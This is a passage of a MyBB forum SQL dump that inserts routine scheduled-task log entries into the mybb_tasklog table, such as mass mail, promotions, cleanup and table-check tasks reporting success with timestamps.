mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11527', '5', '1350708301', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11528', '9', '1350708909', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11529', '3', '1350709152', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11530', '1', '1350709219', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11531', '7', '1350709243', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11532', '5', '1350709529', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11533', '9', '1350709875', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11534', '5', '1350710744', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11535', '9', '1350710765', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11536', '3', '1350711026', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11537', '9', '1350711788', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11538', '5', '1350712018', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11539', '9', '1350712921', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11540', '3', '1350712937', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11541', '1', '1350713101', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11542', '7', '1350713335', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11543', '5', '1350713338', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11544', '9', '1350713645', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11545', '5', '1350715378', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11546', '9', '1350716660', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11547', '3', '1350717745', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11548', '5', '1350717750', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11549', '1', '1350717760', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11550', '7', '1350717763', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11551', '9', '1350718143', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11552', '5', '1350718150', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11553', '3', '1350718390', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11554', '9', '1350719580', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11555', '5', '1350722585', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11556', '9', '1350722750', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11557', '3', '1350722756', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11558', '1', '1350722759', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11559', '7', '1350722817', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11560', '5', '1350722826', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11561', '9', '1350724405', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11562', '3', '1350724471', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11563', '1', '1350724528', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11564', '7', '1350724576', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11565', '5', '1350724599', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11566', '5', '1350725109', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11567', '9', '1350725122', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11568', '3', '1350725548', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11569', '9', '1350726169', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11570', '5', '1350726560', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11571', '9', '1350726942', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11572', '3', '1350727879', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11573', '1', '1350727882', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11574', '7', '1350727890', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11575', '5', '1350727906', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11576', '9', '1350727945', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11577', '5', '1350728705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11578', '9', '1350728747', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11579', '3', '1350729388', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11580', '9', '1350729832', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11581', '5', '1350729900', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11582', '9', '1350730868', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11583', '3', '1350731430', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11584', '1', '1350731446', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11585', '7', '1350731813', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11586', '5', '1350732011', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11587', '9', '1350732482', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11588', '5', '1350732496', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11589', '3', '1350732610', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11590', '9', '1350734504', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11591', '5', '1350734523', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11592', '3', '1350734530', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11593', '1', '1350734537', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11594', '4', '1350734554', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11595', '7', '1350735031', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11596', '5', '1350735053', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11597', '9', '1350735083', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11598', '5', '1350735918', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11599', '9', '1350736016', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11600', '3', '1350736247', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11601', '9', '1350736817', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11602', '5', '1350737116', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11603', '9', '1350737764', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11604', '3', '1350737997', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11605', '1', '1350738072', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11606', '7', '1350738188', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11607', '5', '1350738492', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11608', '9', '1350738714', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11609', '5', '1350739721', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11610', '9', '1350739962', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11611', '3', '1350739990', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11612', '9', '1350741387', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11613', '5', '1350741392', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11614', '3', '1350741590', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11615', '1', '1350742511', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11616', '7', '1350742519', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11617', '5', '1350742652', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11618', '9', '1350743033', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11619', '5', '1350743184', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11620', '9', '1350743328', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11621', '3', '1350743490', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11622', '9', '1350744058', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11623', '5', '1350745569', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11624', '9', '1350745587', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11625', '3', '1350745649', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11626', '1', '1350745657', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11627', '7', '1350745661', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11628', '9', '1350745822', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11629', '5', '1350746767', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11630', '9', '1350746893', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11631', '3', '1350747071', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11632', '9', '1350747653', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11633', '5', '1350747921', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11634', '9', '1350748692', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11635', '3', '1350748747', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11636', '1', '1350748901', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11637', '7', '1350748906', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11638', '5', '1350749106', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11639', '9', '1350749491', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11640', '5', '1350750323', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11641', '9', '1350750406', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11642', '3', '1350750677', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11643', '9', '1350751655', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11644', '5', '1350751687', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11645', '9', '1350752109', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11646', '3', '1350752419', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11647', '1', '1350752424', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11648', '7', '1350752499', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11649', '5', '1350752724', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11650', '9', '1350753052', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11651', '5', '1350754073', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11652', '9', '1350754295', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11653', '3', '1350754303', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11654', '9', '1350754900', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11655', '5', '1350755149', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11656', '9', '1350755710', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11657', '3', '1350755944', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11658', '1', '1350756037', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11659', '7', '1350756093', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11660', '5', '1350756310', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11661', '9', '1350756610', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11662', '5', '1350757506', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11663', '9', '1350757575', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11664', '3', '1350757803', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11665', '9', '1350758436', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11666', '5', '1350758702', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11667', '9', '1350759371', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11668', '3', '1350759558', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11669', '1', '1350759610', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11670', '7', '1350759612', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11671', '5', '1350759918', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11672', '9', '1350760244', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11673', '5', '1350761123', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11674', '9', '1350761140', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11675', '3', '1350761526', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11676', '9', '1350762075', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11677', '5', '1350762440', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11678', '9', '1350762946', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11679', '3', '1350763152', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11680', '1', '1350763263', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11681', '7', '1350763273', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11682', '5', '1350763501', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11683', '9', '1350763852', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11684', '5', '1350764886', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11685', '9', '1350765142', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11686', '3', '1350765490', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11687', '9', '1350765635', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11688', '5', '1350766076', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11689', '9', '1350766697', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11690', '3', '1350766825', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11691', '1', '1350766842', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11692', '7', '1350766858', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11693', '5', '1350767111', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11694', '9', '1350767421', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11695', '5', '1350768395', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11696', '9', '1350768425', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11697', '3', '1350768641', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11698', '9', '1350769506', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11699', '5', '1350769543', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11700', '9', '1350770175', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11701', '3', '1350770346', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11702', '1', '1350770611', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11703', '7', '1350770619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11704', '5', '1350770735', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11705', '9', '1350771013', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11706', '5', '1350771929', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11707', '9', '1350772009', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11708', '3', '1350772400', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11709', '9', '1350773560', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11710', '5', '1350773586', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11711', '9', '1350773741', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11712', '3', '1350774048', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11713', '1', '1350774127', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11714', '7', '1350774137', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11715', '5', '1350774323', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11716', '9', '1350774710', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11717', '5', '1350775569', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11718', '9', '1350775691', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11719', '3', '1350775802', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11720', '9', '1350776893', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11721', '5', '1350776911', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11722', '9', '1350778287', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11723', '3', '1350779369', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11724', '1', '1350780080', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11725', '2', '1350780084', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11726', '7', '1350780098', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11727', '11', '1350780124', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11728', '5', '1350780128', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11729', '9', '1350780211', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11730', '3', '1350780215', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11731', '5', '1350780308', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11732', '9', '1350781761', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11733', '3', '1350781817', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11734', '1', '1350781838', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11735', '7', '1350781863', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11736', '5', '1350781899', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11737', '9', '1350781981', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11738', '5', '1350782722', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11739', '9', '1350782983', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11740', '3', '1350783001', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11741', '9', '1350783653', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11742', '5', '1350783929', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11743', '9', '1350784654', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11744', '3', '1350784764', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11745', '1', '1350784851', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11746', '7', '1350784857', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11747', '5', '1350785229', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11748', '9', '1350785532', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11749', '5', '1350786351', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11750', '9', '1350787125', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11751', '3', '1350788001', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11752', '9', '1350788091', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11753', '5', '1350788159', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11754', '9', '1350788172', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11755', '3', '1350788354', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11756', '1', '1350788422', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11757', '7', '1350788450', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11758', '5', '1350788718', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11759', '9', '1350789038', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11760', '5', '1350789928', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11761', '9', '1350789958', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11762', '3', '1350790204', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11763', '9', '1350791894', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11764', '5', '1350791901', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11765', '3', '1350792153', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11766', '1', '1350792280', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11767', '7', '1350793049', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11768', '5', '1350793062', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11769', '9', '1350793075', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11770', '5', '1350793730', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11771', '9', '1350793750', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11772', '3', '1350793835', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11773', '9', '1350794407', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11774', '5', '1350794804', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11775', '9', '1350795307', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11776', '3', '1350795549', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11777', '1', '1350795639', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11778', '7', '1350795645', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11779', '5', '1350795911', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11780', '9', '1350796225', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11781', '5', '1350797139', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11782', '9', '1350797196', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11783', '3', '1350797416', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11784', '9', '1350798008', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11785', '5', '1350798303', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11786', '9', '1350799164', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11787', '3', '1350799278', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11788', '1', '1350799301', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11789', '7', '1350799439', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11790', '5', '1350799576', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11791', '9', '1350799844', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11792', '5', '1350800703', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11793', '9', '1350800750', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11794', '3', '1350801064', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11795', '9', '1350801614', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11796', '5', '1350801950', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11797', '9', '1350802552', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11798', '3', '1350802861', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11799', '1', '1350802877', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11800', '7', '1350802917', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11801', '5', '1350803106', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11802', '9', '1350803648', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11803', '5', '1350804375', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11804', '9', '1350804530', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11805', '3', '1350804941', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11806', '9', '1350805346', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11807', '5', '1350805600', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11808', '9', '1350806356', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11809', '3', '1350806432', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11810', '1', '1350806497', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11811', '7', '1350806512', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11812', '5', '1350806957', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11813', '9', '1350807368', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11814', '5', '1350809174', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11815', '9', '1350809479', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11816', '3', '1350809572', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11817', '9', '1350809833', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11818', '3', '1350809957', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11819', '1', '1350810017', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11820', '7', '1350810024', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11821', '5', '1350810346', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11822', '9', '1350810777', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11823', '5', '1350811513', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11824', '9', '1350811552', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11825', '3', '1350814399', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11826', '9', '1350814426', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11827', '5', '1350814435', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11828', '1', '1350814447', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11829', '7', '1350814461', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11830', '5', '1350817374', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11831', '9', '1350817564', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11832', '3', '1350819139', 'The user cleanup 